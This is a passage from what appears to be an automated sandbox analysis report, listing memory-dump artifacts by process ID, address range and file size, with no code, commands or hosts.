                                                                                                      Filesize

                                                                                                      12.3MB

                                                                                                    • memory/1800-255-0x0000000000000000-mapping.dmp
                                                                                                    • memory/1848-79-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                      Filesize

                                                                                                      88KB

                                                                                                    • memory/1848-76-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2068-176-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2180-215-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2212-229-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2216-232-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2216-235-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2216-236-0x00000000005D0000-0x00000000005E2000-memory.dmp
                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/2224-307-0x00000000049A0000-0x00000000049A1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2224-308-0x00000000049A2000-0x00000000049A3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2228-205-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2228-181-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2264-240-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2268-200-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2288-149-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2320-228-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2320-259-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2324-244-0x0000000000402F68-mapping.dmp
                                                                                                    • memory/2324-242-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/2332-151-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2344-315-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2344-214-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2388-217-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2428-184-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2436-157-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2440-249-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2448-314-0x00000000002C0000-0x00000000002C2000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2448-313-0x00000000002B0000-0x00000000002B1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2448-237-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2468-231-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2480-238-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2500-122-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2508-260-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2528-161-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2544-279-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-257-0x0000000004642000-0x0000000004643000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-271-0x0000000006270000-0x0000000006271000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-223-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2544-256-0x0000000004640000-0x0000000004641000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-253-0x0000000004730000-0x0000000004731000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-278-0x00000000063E0000-0x00000000063E1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-252-0x0000000002250000-0x0000000002251000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-250-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2544-270-0x00000000060F0000-0x00000000060F1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-280-0x0000000006460000-0x0000000006461000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-262-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-265-0x0000000006230000-0x0000000006231000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2544-254-0x0000000002520000-0x0000000002521000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2556-123-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2556-126-0x000007FEF2350000-0x000007FEF33E6000-memory.dmp
                                                                                                      Filesize

                                                                                                      16.6MB

                                                                                                    • memory/2556-133-0x0000000000400000-0x0000000000402000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2564-288-0x00000000049B2000-0x00000000049B3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2564-287-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2568-225-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2576-243-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/2576-224-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2604-185-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2608-207-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2608-293-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                                      Filesize

                                                                                                      12.3MB

                                                                                                    • memory/2608-294-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                                      Filesize

                                                                                                      12.3MB

                                                                                                    • memory/2612-127-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2632-192-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2632-193-0x0000000000770000-0x0000000000871000-memory.dmp
                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/2632-187-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2632-194-0x00000000005A0000-0x00000000005FC000-memory.dmp
                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/2640-198-0x00000000004E0000-0x0000000000550000-memory.dmp
                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2640-247-0x0000000002950000-0x0000000002A51000-memory.dmp
                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/2640-191-0x00000000FFA5246C-mapping.dmp
                                                                                                    • memory/2660-134-0x00000000002F0000-0x0000000000302000-memory.dmp
                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/2660-129-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2660-135-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2684-136-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/2684-131-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2684-139-0x0000000001CA0000-0x0000000001CA1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2712-209-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2712-221-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2716-222-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2760-211-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2764-212-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2776-311-0x0000000004890000-0x0000000004891000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2776-312-0x0000000004892000-0x0000000004893000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/2816-226-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2840-227-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2880-167-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2888-210-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2908-248-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2932-138-0x0000000000000000-mapping.dmp
                                                                                                    • memory/2984-199-0x0000000000000000-mapping.dmp
                                                                                                    • memory/3008-141-0x0000000000000000-mapping.dmp
                                                                                                    • memory/3008-148-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3052-204-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4552-261-0x0000000000000000-mapping.dmp
                                                                                                    • memory/7116-306-0x00000000049B2000-0x00000000049B3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/7116-305-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/7924-283-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/7924-282-0x0000000002220000-0x0000000002221000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/7924-284-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/7924-285-0x0000000004942000-0x0000000004943000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8036-310-0x0000000004AD2000-0x0000000004AD3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8036-309-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8064-298-0x0000000004AF2000-0x0000000004AF3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8064-297-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8068-296-0x0000000004AC2000-0x0000000004AC3000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8068-295-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8108-290-0x0000000002150000-0x0000000002D9A000-memory.dmp
                                                                                                      Filesize

                                                                                                      12.3MB

                                                                                                    • memory/8108-289-0x0000000002150000-0x0000000002D9A000-memory.dmp
                                                                                                      Filesize

                                                                                                      12.3MB

                                                                                                    • memory/8140-304-0x0000000004952000-0x0000000004953000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8140-303-0x0000000004950000-0x0000000004951000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/8184-286-0x00000000004E0000-0x00000000004E1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB